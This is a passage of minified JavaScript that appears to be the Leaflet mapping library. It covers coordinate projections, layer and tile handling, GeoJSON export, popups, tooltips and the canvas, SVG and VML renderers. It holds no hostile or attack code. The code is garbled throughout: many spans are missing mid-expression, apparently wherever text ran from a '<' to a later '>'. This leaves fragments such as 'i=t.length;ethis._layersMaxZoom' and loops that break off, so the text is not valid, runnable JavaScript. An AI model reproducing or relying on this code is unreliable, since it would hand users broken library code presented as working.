Q([-180,-90],[180,90])},gi={R:6378137,R_MINOR:6356752314245179e-9,bounds:new Q([-2003750834279e-5,-1549657073972e-5],[2003750834279e-5,1876465623138e-5]),project:function(t){var e=Math.PI/180,i=this.R,n=t.lat*e,o=this.R_MINOR/i,s=Math.sqrt(1-o*o),r=s*Math.sin(n),a=Math.tan(Math.PI/4-n/2)/Math.pow((1-r)/(1+r),s/2);return n=-i*Math.log(Math.max(a,1e-10)),new E(t.lng*e*i,n)},unproject:function(t){for(var e=180/Math.PI,i=this.R,n=this.R_MINOR/i,o=Math.sqrt(1-n*n),s=Math.exp(-t.y/i),r=Math.PI/2-2*Math.atan(s),a=0,u=.1,c;a<15&&Math.abs(u)>1e-7;a++)c=o*Math.sin(r),c=Math.pow((1-c)/(1+c),o/2),u=Math.PI/2-2*Math.atan(s*c)-r,r+=u;return new j(r*e,t.x*e/i)}},Do={__proto__:null,LonLat:vi,Mercator:gi,SphericalMercator:Ve},Ro=l({},Wt,{code:"EPSG:3395",projection:gi,transformation:function(){var t=.5/(Math.PI*gi.R);return re(t,.5,-t,.5)}()}),yn=l({},Wt,{code:"EPSG:4326",projection:vi,transformation:re(1/180,1,-1/180,.5)}),Fo=l({},Zt,{projection:vi,transformation:re(1,0,-1,0),scale:function(t){return Math.pow(2,t)},zoom:function(t){return Math.log(t)/Math.LN2},distance:function(t,e){var i=e.lng-t.lng,n=e.lat-t.lat;return Math.sqrt(i*i+n*n)},infinite:!0});Zt.Earth=Wt,Zt.EPSG3395=Ro,Zt.EPSG3857=qe,Zt.EPSG900913=Gn,Zt.EPSG4326=yn,Zt.Simple=Fo;var Ct=Ht.extend({options:{pane:"overlayPane",attribution:null,bubblingMouseEvents:!0},addTo:function(t){return t.addLayer(this),this},remove:function(){return this.removeFrom(this._map||this._mapToAdd)},removeFrom:function(t){return t&&t.removeLayer(this),this},getPane:function(t){return this._map.getPane(t?this.options[t]||t:this.options.pane)},addInteractiveTarget:function(t){return this._map._targets[g(t)]=this,this},removeInteractiveTarget:function(t){return delete this._map._targets[g(t)],this},getAttribution:function(){return this.options.attribution},_layerAdd:function(t){var e=t.target;if(e.hasLayer(this)){if(this._map=e,this._zoomAnimated=e._zoomAnimated,this.getEvents){var i=this.getEvents();e.on(i,this),this.once("remove",function(){e.off(i,this)},this)}this.onAdd(e),this.fire("add"),e.fire("layeradd",{layer:this})}}});H.include({addLayer:function(t){if(!t._layerAdd)throw new Error("The provided object is not a Layer.");var e=g(t);return this._layers[e]?this:(this._layers[e]=t,t._mapToAdd=this,t.beforeAdd&&t.beforeAdd(this),this.whenReady(t._layerAdd,t),this)},removeLayer:function(t){var e=g(t);return this._layers[e]?(this._loaded&&t.onRemove(this),delete this._layers[e],this._loaded&&(this.fire("layerremove",{layer:t}),t.fire("remove")),t._map=t._mapToAdd=null,this):this},hasLayer:function(t){return g(t)in this._layers},eachLayer:function(t,e){for(var i in this._layers)t.call(e,this._layers[i]);return this},_addLayers:function(t){t=t?q(t)?t:[t]:[];for(var e=0,i=t.length;ethis._layersMaxZoom&&this.setZoom(this._layersMaxZoom),this.options.minZoom===void 0&&this._layersMinZoom&&this.getZoom()=2&&e[0]instanceof j&&e[0].equals(e[i-1])&&e.pop(),e},_setLatLngs:function(t){At.prototype._setLatLngs.call(this,t),xt(this._latlngs)&&(this._latlngs=[this._latlngs])},_defaultShape:function(){return xt(this._latlngs[0])?this._latlngs[0]:this._latlngs[0][0]},_clipPoints:function(){var t=this._renderer._bounds,e=this.options.weight,i=new E(e,e);if(t=new Q(t.min.subtract(i),t.max.add(i)),this._parts=[],!(!this._pxBounds||!this._pxBounds.intersects(t))){if(this.options.noClip){this._parts=this._rings;return}for(var n=0,o=this._rings.length,s;nt.y!=o.y>t.y&&t.x<(o.x-n.x)*(t.y-n.y)/(o.y-n.y)+n.x&&(e=!e);return e||At.prototype._containsPoint.call(this,t,!0)}});function Ko(t,e){return new ie(t,e)}var Bt=It.extend({initialize:function(t,e){k(this,e),this._layers={},t&&this.addData(t)},addData:function(t){var e=q(t)?t:t.features,i,n,o;if(e){for(i=0,n=e.length;i0&&o.push(o[0].slice()),o}function ne(t,e){return t.feature?l({},t.feature,{geometry:e}):De(e)}function De(t){return t.type==="Feature"||t.type==="FeatureCollection"?t:{type:"Feature",properties:{},geometry:t}}var xi={toGeoJSON:function(t){return ne(this,{type:"Point",coordinates:Pi(this.getLatLng(),t)})}};Ze.include(xi),yi.include(xi),Ie.include(xi),At.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=Ne(this._latlngs,e?1:0,!1,t);return ne(this,{type:(e?"Multi":"")+"LineString",coordinates:i})}}),ie.include({toGeoJSON:function(t){var e=!xt(this._latlngs),i=e&&!xt(this._latlngs[0]),n=Ne(this._latlngs,i?2:e?1:0,!0,t);return e||(n=[n]),ne(this,{type:(i?"Multi":"")+"Polygon",coordinates:n})}}),te.include({toMultiPoint:function(t){var e=[];return this.eachLayer(function(i){e.push(i.toGeoJSON(t).geometry.coordinates)}),ne(this,{type:"MultiPoint",coordinates:e})},toGeoJSON:function(t){var e=this.feature&&this.feature.geometry&&this.feature.geometry.type;if(e==="MultiPoint")return this.toMultiPoint(t);var i=e==="GeometryCollection",n=[];return this.eachLayer(function(o){if(o.toGeoJSON){var s=o.toGeoJSON(t);if(i)n.push(s.geometry);else{var r=De(s);r.type==="FeatureCollection"?n.push.apply(n,r.features):n.push(r)}}}),i?ne(this,{geometries:n,type:"GeometryCollection"}):{type:"FeatureCollection",features:n}}});function xn(t,e){return new Bt(t,e)}var Yo=xn,Re=Ct.extend({options:{opacity:1,alt:"",interactive:!1,crossOrigin:!1,errorOverlayUrl:"",zIndex:1,className:""},initialize:function(t,e,i){this._url=t,this._bounds=it(e),k(this,i)},onAdd:function(){this._image||(this._initImage(),this.options.opacity<1&&this._updateOpacity()),this.options.interactive&&(A(this._image,"leaflet-interactive"),this.addInteractiveTarget(this._image)),this.getPane().appendChild(this._image),this._reset()},onRemove:function(){$(this._image),this.options.interactive&&this.removeInteractiveTarget(this._image)},setOpacity:function(t){return this.options.opacity=t,this._image&&this._updateOpacity(),this},setStyle:function(t){return t.opacity&&this.setOpacity(t.opacity),this},bringToFront:function(){return this._map&&Qt(this._image),this},bringToBack:function(){return this._map&&$t(this._image),this},setUrl:function(t){return this._url=t,this._image&&(this._image.src=t),this},setBounds:function(t){return this._bounds=it(t),this._map&&this._reset(),this},getEvents:function(){var t={zoom:this._reset,viewreset:this._reset};return this._zoomAnimated&&(t.zoomanim=this._animateZoom),t},setZIndex:function(t){return this.options.zIndex=t,this._updateZIndex(),this},getBounds:function(){return this._bounds},getElement:function(){return this._image},_initImage:function(){var t=this._url.tagName==="IMG",e=this._image=t?this._url:U("img");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onload=_(this.fire,this,"load"),e.onerror=_(this._overlayOnError,this,"error"),(this.options.crossOrigin||this.options.crossOrigin==="")&&(e.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),this.options.zIndex&&this._updateZIndex(),t){this._url=e.src;return}e.src=this._url,e.alt=this.options.alt},_animateZoom:function(t){var e=this._map.getZoomScale(t.zoom),i=this._map._latLngBoundsToNewLayerBounds(this._bounds,t.zoom,t.center).min;Gt(this._image,i,e)},_reset:function(){var t=this._image,e=new Q(this._map.latLngToLayerPoint(this._bounds.getNorthWest()),this._map.latLngToLayerPoint(this._bounds.getSouthEast())),i=e.getSize();nt(t,e.min),t.style.width=i.x+"px",t.style.height=i.y+"px"},_updateOpacity:function(){Pt(this._image,this.options.opacity)},_updateZIndex:function(){this._image&&this.options.zIndex!==void 0&&this.options.zIndex!==null&&(this._image.style.zIndex=this.options.zIndex)},_overlayOnError:function(){this.fire("error");var t=this.options.errorOverlayUrl;t&&this._url!==t&&(this._url=t,this._image.src=t)},getCenter:function(){return this._bounds.getCenter()}}),Jo=function(t,e,i){return new Re(t,e,i)},Ln=Re.extend({options:{autoplay:!0,loop:!0,keepAspectRatio:!0,muted:!1,playsInline:!0},_initImage:function(){var t=this._url.tagName==="VIDEO",e=this._image=t?this._url:U("video");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onloadeddata=_(this.fire,this,"load"),t){for(var i=e.getElementsByTagName("source"),n=[],o=0;o0?n:[e.src];return}q(this._url)||(this._url=[this._url]),!this.options.keepAspectRatio&&Object.prototype.hasOwnProperty.call(e.style,"objectFit")&&(e.style.objectFit="fill"),e.autoplay=!!this.options.autoplay,e.loop=!!this.options.loop,e.muted=!!this.options.muted,e.playsInline=!!this.options.playsInline;for(var s=0;s×',I(n,"click",function(o){ut(o),this.close()},this)}},_updateLayout:function(){var t=this._contentNode,e=t.style;e.width="",e.whiteSpace="nowrap";var i=t.offsetWidth;i=Math.min(i,this.options.maxWidth),i=Math.max(i,this.options.minWidth),e.width=i+1+"px",e.whiteSpace="",e.height="";var n=t.offsetHeight,o=this.options.maxHeight,s="leaflet-popup-scrolled";o&&n>o?(e.height=o+"px",A(t,s)):tt(t,s),this._containerWidth=this._container.offsetWidth},_animateZoom:function(t){var e=this._map._latLngToNewLayerPoint(this._latlng,t.zoom,t.center),i=this._getAnchor();nt(this._container,e.add(i))},_adjustPan:function(){if(this.options.autoPan){if(this._map._panAnim&&this._map._panAnim.stop(),this._autopanning){this._autopanning=!1;return}var t=this._map,e=parseInt(ue(this._container,"marginBottom"),10)||0,i=this._container.offsetHeight+e,n=this._containerWidth,o=new E(this._containerLeft,-i-this._containerBottom);o._add(qt(this._container));var s=t.layerPointToContainerPoint(o),r=Z(this.options.autoPanPadding),a=Z(this.options.autoPanPaddingTopLeft||r),u=Z(this.options.autoPanPaddingBottomRight||r),c=t.getSize(),y=0,C=0;s.x+n+u.x>c.x&&(y=s.x+n-c.x+u.x),s.x-y-a.x<0&&(y=s.x-a.x),s.y+i+u.y>c.y&&(C=s.y+i-c.y+u.y),s.y-C-a.y<0&&(C=s.y-a.y),(y||C)&&(this.options.keepInView&&(this._autopanning=!0),t.fire("autopanstart").panBy([y,C]))}},_getAnchor:function(){return Z(this._source&&this._source._getPopupAnchor?this._source._getPopupAnchor():[0,0])}}),$o=function(t,e){return new Fe(t,e)};H.mergeOptions({closePopupOnClick:!0}),H.include({openPopup:function(t,e,i){return this._initOverlay(Fe,t,e,i).openOn(this),this},closePopup:function(t){return t=arguments.length?t:this._popup,t&&t.close(),this}}),Ct.include({bindPopup:function(t,e){return this._popup=this._initOverlay(Fe,this._popup,t,e),this._popupHandlersAdded||(this.on({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!0),this},unbindPopup:function(){return this._popup&&(this.off({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!1,this._popup=null),this},openPopup:function(t){return this._popup&&(this instanceof It||(this._popup._source=this),this._popup._prepareOpen(t||this._latlng)&&this._popup.openOn(this._map)),this},closePopup:function(){return this._popup&&this._popup.close(),this},togglePopup:function(){return this._popup&&this._popup.toggle(this),this},isPopupOpen:function(){return this._popup?this._popup.isOpen():!1},setPopupContent:function(t){return this._popup&&this._popup.setContent(t),this},getPopup:function(){return this._popup},_openPopup:function(t){if(!(!this._popup||!this._map)){Kt(t);var e=t.layer||t.target;if(this._popup._source===e&&!(e instanceof Vt)){this._map.hasLayer(this._popup)?this.closePopup():this.openPopup(t.latlng);return}this._popup._source=e,this.openPopup(t.latlng)}},_movePopup:function(t){this._popup.setLatLng(t.latlng)},_onKeyPress:function(t){t.originalEvent.keyCode===13&&this._openPopup(t)}});var He=zt.extend({options:{pane:"tooltipPane",offset:[0,0],direction:"auto",permanent:!1,sticky:!1,opacity:.9},onAdd:function(t){zt.prototype.onAdd.call(this,t),this.setOpacity(this.options.opacity),t.fire("tooltipopen",{tooltip:this}),this._source&&(this.addEventParent(this._source),this._source.fire("tooltipopen",{tooltip:this},!0))},onRemove:function(t){zt.prototype.onRemove.call(this,t),t.fire("tooltipclose",{tooltip:this}),this._source&&(this.removeEventParent(this._source),this._source.fire("tooltipclose",{tooltip:this},!0))},getEvents:function(){var t=zt.prototype.getEvents.call(this);return this.options.permanent||(t.preclick=this.close),t},_initLayout:function(){var t="leaflet-tooltip",e=t+" "+(this.options.className||"")+" leaflet-zoom-"+(this._zoomAnimated?"animated":"hide");this._contentNode=this._container=U("div",e),this._container.setAttribute("role","tooltip"),this._container.setAttribute("id","leaflet-tooltip-"+g(this))},_updateLayout:function(){},_adjustPan:function(){},_setPosition:function(t){var e,i,n=this._map,o=this._container,s=n.latLngToContainerPoint(n.getCenter()),r=n.layerPointToContainerPoint(t),a=this.options.direction,u=o.offsetWidth,c=o.offsetHeight,y=Z(this.options.offset),C=this._getAnchor();a==="top"?(e=u/2,i=c):a==="bottom"?(e=u/2,i=0):a==="center"?(e=u/2,i=c/2):a==="right"?(e=0,i=c/2):a==="left"?(e=u,i=c/2):r.xthis.options.maxZoom||in?this._retainParent(o,s,r,n):!1)},_retainChildren:function(t,e,i,n){for(var o=2*t;o<2*t+2;o++)for(var s=2*e;s<2*e+2;s++){var r=new E(o,s);r.z=i+1;var a=this._tileCoordsToKey(r),u=this._tiles[a];if(u&&u.active){u.retain=!0;continue}else u&&u.loaded&&(u.retain=!0);i+1this.options.maxZoom||this.options.minZoom!==void 0&&o1){this._setView(t,i);return}for(var C=o.min.y;C<=o.max.y;C++)for(var N=o.min.x;N<=o.max.x;N++){var _t=new E(N,C);if(_t.z=this._tileZoom,!!this._isValidTile(_t)){var at=this._tiles[this._tileCoordsToKey(_t)];at?at.current=!0:r.push(_t)}}if(r.sort(function(gt,se){return gt.distanceTo(s)-se.distanceTo(s)}),r.length!==0){this._loading||(this._loading=!0,this.fire("loading"));var Lt=document.createDocumentFragment();for(N=0;Ni.max.x)||!e.wrapLat&&(t.yi.max.y))return!1}if(!this.options.bounds)return!0;var n=this._tileCoordsToBounds(t);return it(this.options.bounds).overlaps(n)},_keyToBounds:function(t){return this._tileCoordsToBounds(this._keyToTileCoords(t))},_tileCoordsToNwSe:function(t){var e=this._map,i=this.getTileSize(),n=t.scaleBy(i),o=n.add(i),s=e.unproject(n,t.z),r=e.unproject(o,t.z);return[s,r]},_tileCoordsToBounds:function(t){var e=this._tileCoordsToNwSe(t),i=new vt(e[0],e[1]);return this.options.noWrap||(i=this._map.wrapLatLngBounds(i)),i},_tileCoordsToKey:function(t){return t.x+":"+t.y+":"+t.z},_keyToTileCoords:function(t){var e=t.split(":"),i=new E(+e[0],+e[1]);return i.z=+e[2],i},_removeTile:function(t){var e=this._tiles[t];e&&($(e.el),delete this._tiles[t],this.fire("tileunload",{tile:e.el,coords:this._keyToTileCoords(t)}))},_initTile:function(t){A(t,"leaflet-tile");var e=this.getTileSize();t.style.width=e.x+"px",t.style.height=e.y+"px",t.onselectstart=v,t.onmousemove=v,T.ielt9&&this.options.opacity<1&&Pt(t,this.options.opacity)},_addTile:function(t,e){var i=this._getTilePos(t),n=this._tileCoordsToKey(t),o=this.createTile(this._wrapCoords(t),_(this._tileReady,this,t));this._initTile(o),this.createTile.length<2&&X(_(this._tileReady,this,t,null,o)),nt(o,i),this._tiles[n]={el:o,coords:t,current:!0},e.appendChild(o),this.fire("tileloadstart",{tile:o,coords:t})},_tileReady:function(t,e,i){e&&this.fire("tileerror",{error:e,tile:i,coords:t});var n=this._tileCoordsToKey(t);i=this._tiles[n],i&&(i.loaded=+new Date,this._map._fadeAnimated?(Pt(i.el,0),dt(this._fadeFrame),this._fadeFrame=X(this._updateOpacity,this)):(i.active=!0,this._pruneTiles()),e||(A(i.el,"leaflet-tile-loaded"),this.fire("tileload",{tile:i.el,coords:t})),this._noTilesToLoad()&&(this._loading=!1,this.fire("load"),T.ielt9||!this._map._fadeAnimated?X(this._pruneTiles,this):setTimeout(_(this._pruneTiles,this),250)))},_getTilePos:function(t){return t.scaleBy(this.getTileSize()).subtract(this._level.origin)},_wrapCoords:function(t){var e=new E(this._wrapX?S(t.x,this._wrapX):t.x,this._wrapY?S(t.y,this._wrapY):t.y);return e.z=t.z,e},_pxBoundsToTileRange:function(t){var e=this.getTileSize();return new Q(t.min.unscaleBy(e).floor(),t.max.unscaleBy(e).ceil().subtract([1,1]))},_noTilesToLoad:function(){for(var t in this._tiles)if(!this._tiles[t].loaded)return!1;return!0}});function is(t){return new ve(t)}var oe=ve.extend({options:{minZoom:0,maxZoom:18,subdomains:"abc",errorTileUrl:"",zoomOffset:0,tms:!1,zoomReverse:!1,detectRetina:!1,crossOrigin:!1,referrerPolicy:!1},initialize:function(t,e){this._url=t,e=k(this,e),e.detectRetina&&T.retina&&e.maxZoom>0?(e.tileSize=Math.floor(e.tileSize/2),e.zoomReverse?(e.zoomOffset--,e.minZoom=Math.min(e.maxZoom,e.minZoom+1)):(e.zoomOffset++,e.maxZoom=Math.max(e.minZoom,e.maxZoom-1)),e.minZoom=Math.max(0,e.minZoom)):e.zoomReverse?e.minZoom=Math.min(e.maxZoom,e.minZoom):e.maxZoom=Math.max(e.minZoom,e.maxZoom),typeof e.subdomains=="string"&&(e.subdomains=e.subdomains.split("")),this.on("tileunload",this._onTileRemove)},setUrl:function(t,e){return this._url===t&&e===void 0&&(e=!0),this._url=t,e||this.redraw(),this},createTile:function(t,e){var i=document.createElement("img");return I(i,"load",_(this._tileOnLoad,this,e,i)),I(i,"error",_(this._tileOnError,this,e,i)),(this.options.crossOrigin||this.options.crossOrigin==="")&&(i.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),typeof this.options.referrerPolicy=="string"&&(i.referrerPolicy=this.options.referrerPolicy),i.alt="",i.src=this.getTileUrl(t),i},getTileUrl:function(t){var e={r:T.retina?"@2x":"",s:this._getSubdomain(t),x:t.x,y:t.y,z:this._getZoomForUrl()};if(this._map&&!this._map.options.crs.infinite){var i=this._globalTileRange.max.y-t.y;this.options.tms&&(e.y=i),e["-y"]=i}return rt(this._url,l(e,this.options))},_tileOnLoad:function(t,e){T.ielt9?setTimeout(_(t,this,null,e),0):t(null,e)},_tileOnError:function(t,e,i){var n=this.options.errorTileUrl;n&&e.getAttribute("src")!==n&&(e.src=n),t(i,e)},_onTileRemove:function(t){t.tile.onload=null},_getZoomForUrl:function(){var t=this._tileZoom,e=this.options.maxZoom,i=this.options.zoomReverse,n=this.options.zoomOffset;return i&&(t=e-t),t+n},_getSubdomain:function(t){var e=Math.abs(t.x+t.y)%this.options.subdomains.length;return this.options.subdomains[e]},_abortLoading:function(){var t,e;for(t in this._tiles)if(this._tiles[t].coords.z!==this._tileZoom&&(e=this._tiles[t].el,e.onload=v,e.onerror=v,!e.complete)){e.src=G;var i=this._tiles[t].coords;$(e),delete this._tiles[t],this.fire("tileabort",{tile:e,coords:i})}},_removeTile:function(t){var e=this._tiles[t];if(e)return e.el.setAttribute("src",G),ve.prototype._removeTile.call(this,t)},_tileReady:function(t,e,i){if(!(!this._map||i&&i.getAttribute("src")===G))return ve.prototype._tileReady.call(this,t,e,i)}});function Mn(t,e){return new oe(t,e)}var Cn=oe.extend({defaultWmsParams:{service:"WMS",request:"GetMap",layers:"",styles:"",format:"image/jpeg",transparent:!1,version:"1.1.1"},options:{crs:null,uppercase:!1},initialize:function(t,e){this._url=t;var i=l({},this.defaultWmsParams);for(var n in e)n in this.options||(i[n]=e[n]);e=k(this,e);var o=e.detectRetina&&T.retina?2:1,s=this.getTileSize();i.width=s.x*o,i.height=s.y*o,this.wmsParams=i},onAdd:function(t){this._crs=this.options.crs||t.options.crs,this._wmsVersion=parseFloat(this.wmsParams.version);var e=this._wmsVersion>=1.3?"crs":"srs";this.wmsParams[e]=this._crs.code,oe.prototype.onAdd.call(this,t)},getTileUrl:function(t){var e=this._tileCoordsToNwSe(t),i=this._crs,n=pt(i.project(e[0]),i.project(e[1])),o=n.min,s=n.max,r=(this._wmsVersion>=1.3&&this._crs===yn?[o.y,o.x,s.y,s.x]:[o.x,o.y,s.x,s.y]).join(","),a=oe.prototype.getTileUrl.call(this,t);return a+ft(this.wmsParams,a,this.options.uppercase)+(this.options.uppercase?"&BBOX=":"&bbox=")+r},setParams:function(t,e){return l(this.wmsParams,t),e||this.redraw(),this}});function ns(t,e){return new Cn(t,e)}oe.WMS=Cn,Mn.wms=ns;var Nt=Ct.extend({options:{padding:.1},initialize:function(t){k(this,t),g(this),this._layers=this._layers||{}},onAdd:function(){this._container||(this._initContainer(),A(this._container,"leaflet-zoom-animated")),this.getPane().appendChild(this._container),this._update(),this.on("update",this._updatePaths,this)},onRemove:function(){this.off("update",this._updatePaths,this),this._destroyContainer()},getEvents:function(){var t={viewreset:this._reset,zoom:this._onZoom,moveend:this._update,zoomend:this._onZoomEnd};return this._zoomAnimated&&(t.zoomanim=this._onAnimZoom),t},_onAnimZoom:function(t){this._updateTransform(t.center,t.zoom)},_onZoom:function(){this._updateTransform(this._map.getCenter(),this._map.getZoom())},_updateTransform:function(t,e){var i=this._map.getZoomScale(e,this._zoom),n=this._map.getSize().multiplyBy(.5+this.options.padding),o=this._map.project(this._center,e),s=n.multiplyBy(-i).add(o).subtract(this._map._getNewPixelOrigin(t,e));T.any3d?Gt(this._container,s,i):nt(this._container,s)},_reset:function(){this._update(),this._updateTransform(this._center,this._zoom);for(var t in this._layers)this._layers[t]._reset()},_onZoomEnd:function(){for(var t in this._layers)this._layers[t]._project()},_updatePaths:function(){for(var t in this._layers)this._layers[t]._update()},_update:function(){var t=this.options.padding,e=this._map.getSize(),i=this._map.containerPointToLayerPoint(e.multiplyBy(-t)).round();this._bounds=new Q(i,i.add(e.multiplyBy(1+t*2)).round()),this._center=this._map.getCenter(),this._zoom=this._map.getZoom()}}),Sn=Nt.extend({options:{tolerance:0},getEvents:function(){var t=Nt.prototype.getEvents.call(this);return t.viewprereset=this._onViewPreReset,t},_onViewPreReset:function(){this._postponeUpdatePaths=!0},onAdd:function(){Nt.prototype.onAdd.call(this),this._draw()},_initContainer:function(){var t=this._container=document.createElement("canvas");I(t,"mousemove",this._onMouseMove,this),I(t,"click dblclick mousedown mouseup contextmenu",this._onClick,this),I(t,"mouseout",this._handleMouseOut,this),t._leaflet_disable_events=!0,this._ctx=t.getContext("2d")},_destroyContainer:function(){dt(this._redrawRequest),delete this._ctx,$(this._container),K(this._container),delete this._container},_updatePaths:function(){if(!this._postponeUpdatePaths){var t;this._redrawBounds=null;for(var e in this._layers)t=this._layers[e],t._update();this._redraw()}},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=this._container,i=t.getSize(),n=T.retina?2:1;nt(e,t.min),e.width=n*i.x,e.height=n*i.y,e.style.width=i.x+"px",e.style.height=i.y+"px",T.retina&&this._ctx.scale(2,2),this._ctx.translate(-t.min.x,-t.min.y),this.fire("update")}},_reset:function(){Nt.prototype._reset.call(this),this._postponeUpdatePaths&&(this._postponeUpdatePaths=!1,this._updatePaths())},_initPath:function(t){this._updateDashArray(t),this._layers[g(t)]=t;var e=t._order={layer:t,prev:this._drawLast,next:null};this._drawLast&&(this._drawLast.next=e),this._drawLast=e,this._drawFirst=this._drawFirst||this._drawLast},_addPath:function(t){this._requestRedraw(t)},_removePath:function(t){var e=t._order,i=e.next,n=e.prev;i?i.prev=n:this._drawLast=n,n?n.next=i:this._drawFirst=i,delete t._order,delete this._layers[g(t)],this._requestRedraw(t)},_updatePath:function(t){this._extendRedrawBounds(t),t._project(),t._update(),this._requestRedraw(t)},_updateStyle:function(t){this._updateDashArray(t),this._requestRedraw(t)},_updateDashArray:function(t){if(typeof t.options.dashArray=="string"){var e=t.options.dashArray.split(/[, ]+/),i=[],n,o;for(o=0;o')}}catch{}return function(t){return document.createElement("<"+t+' xmlns="urn:schemas-microsoft.com:vml" class="lvml">')}}(),os={_initContainer:function(){this._container=U("div","leaflet-vml-container")},_update:function(){this._map._animatingZoom||(Nt.prototype._update.call(this),this.fire("update"))},_initPath:function(t){var e=t._container=ge("shape");A(e,"leaflet-vml-shape "+(this.options.className||"")),e.coordsize="1 1",t._path=ge("path"),e.appendChild(t._path),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){var e=t._container;this._container.appendChild(e),t.options.interactive&&t.addInteractiveTarget(e)},_removePath:function(t){var e=t._container;$(e),t.removeInteractiveTarget(e),delete this._layers[g(t)]},_updateStyle:function(t){var e=t._stroke,i=t._fill,n=t.options,o=t._container;o.stroked=!!n.stroke,o.filled=!!n.fill,n.stroke?(e||(e=t._stroke=ge("stroke")),o.appendChild(e),e.weight=n.weight+"px",e.color=n.color,e.opacity=n.opacity,n.dashArray?e.dashStyle=q(n.dashArray)?n.dashArray.join(" "):n.dashArray.replace(/( *, *)/g," "):e.dashStyle="",e.endcap=n.lineCap.replace("butt","flat"),e.joinstyle=n.lineJoin):e&&(o.removeChild(e),t._stroke=null),n.fill?(i||(i=t._fill=ge("fill")),o.appendChild(i),i.color=n.fillColor||n.color,i.opacity=n.fillOpacity):i&&(o.removeChild(i),t._fill=null)},_updateCircle:function(t){var e=t._point.round(),i=Math.round(t._radius),n=Math.round(t._radiusY||i);this._setPath(t,t._empty()?"M0 0":"AL "+e.x+","+e.y+" "+i+","+n+" 0,"+65535*360)},_setPath:function(t,e){t._path.v=e},_bringToFront:function(t){Qt(t._container)},_bringToBack:function(t){$t(t._container)}},We=T.vml?ge:Oi,ye=Nt.extend({_initContainer:function(){this._container=We("svg"),this._container.setAttribute("pointer-events","none"),this._rootGroup=We("g"),this._container.appendChild(this._rootGroup)},_destroyContainer:function(){$(this._container),K(this._container),delete this._container,delete this._rootGroup,delete this._svgSize},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=t.getSize(),i=this._container;(!this._svgSize||!this._svgSize.equals(e))&&(this._svgSize=e,i.setAttribute("width",e.x),i.setAttribute("height",e.y)),nt(i,t.min),i.setAttribute("viewBox",[t.min.x,t.min.y,e.x,e.y].join(" ")),this.fire("update")}},_initPath:function(t){var e=t._path=We("path");t.options.className&&A(e,t.options.className),t.options.interactive&&A(e,"leaflet-interactive"),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){this._rootGroup||this._initContainer(),this._rootGroup.appendChild(t._path),t.addInteractiveTarget(t._path)},_removePath:function(t){$(t._path),t.removeInteractiveTarget(t._path),delete this._layers[g(t)]},_updatePath:function(t){t._project(),t._update()},_updateStyle:function(t){var e=t._path,i=t.options;e&&(i.stroke?(e.setAttribute("stroke",i.color),e.setAttribute("stroke-opacity",i.opacity),e.setAttribute("stroke-width",i.weight),e.setAttribute("stroke-linecap",i.lineCap),e.setAttribute("stroke-linejoin",i.lineJoin),i.dashArray?e.setAttribute("stroke-dasharray",i.dashArray):e.removeAttribute("stroke-dasharray"),i.dashOffset?e.setAttribute("stroke-dashoffset",i.dashOffset):e.removeAttribute("stroke-dashoffset")):e.setAttribute("stroke","none"),i.fill?(e.setAttribute("fill",i.fillColor||i.color),e.setAttribute("fill-opacity",i.fillOpacity),e.setAttribute("fill-rule",i.fillRule||"evenodd")):e.setAttribute("fill","none"))},_updatePoly:function(t,e){this._setPath(t,Zi(t._parts,e))},_updateCircle:function(t){var e=t._point,i=Math.max(Math.round(t._radius),1),n=Math.max(Math.round(t._radiusY),1)||i,o="a"+i+","+n+" 0 1,0 ",s=t._empty()?"M0 0":"M"+(e.x-i)+","+e.y+o+i*2+",0 "+o+-i*2+",0 ";this._setPath(t,s)},_setPath:function(t,e){t._path.setAttribute("d",e)},_bringToFront:function(t){Qt(t._path)},_bringToBack:function(t){$t(t._path)}});T.vml&&ye.include(os);function En(t){return T.svg||T.vml?new ye(t):null}H.include({getRenderer:function(t){var e=t.options.renderer||this._getPaneRenderer(t.options.pane)||this.options.renderer||this._renderer;return e||(e=this._renderer=this._createRenderer()),this.hasLayer(e)||this.addLayer(e),e},_getPaneRenderer:function(t){if(t==="overlayPane"||t===void 0)return!1;var e=this._paneRenderers[t];return e===void 0&&(e=this._createRenderer({pane:t}),this._paneRenderers[t]=e),e},_createRenderer:function(t){return this.options.preferCanvas&&kn(t)||En(t)}});var zn=ie.extend({initialize:function(t,e){ie.prototype.initialize.call(this,this._boundsToLatLngs(t),e)},setBounds:function(t){return this.setLatLngs(this._boundsToLatLngs(t))},_boundsToLatLngs:function(t){return t=it(t),[t.getSouthWest(),t.getNorthWest(),t.getNorthEast(),t.getSouthEast()]}});function ss(t,e){return new zn(t,e)}ye.create=We,ye.pointsToPath=Zi,Bt.geometryToLayer=Ae,Bt.coordsToLatLng=wi,Bt.coordsToLatLngs=Be,Bt.latLngToCoords=Pi,Bt.latLngsToCoords=Ne,Bt.getFeature=ne,Bt.asFeature=De,H.mergeOptions({boxZoom:!0});var On=Et.extend({initialize:function(t){this._map=t,this._container=t._container,this._pane=t._panes.overlayPane,this._resetStateTimeout=0,t.on("unload",this._destroy,this)},addHooks:function(){I(this._container,"mousedown",this._onMouseDown,this)},removeHooks:function(){K(this._container,"mousedown",this._onMouseDown,this)},moved:function(){return this._moved},_destroy:function(){$(this._pane),delete 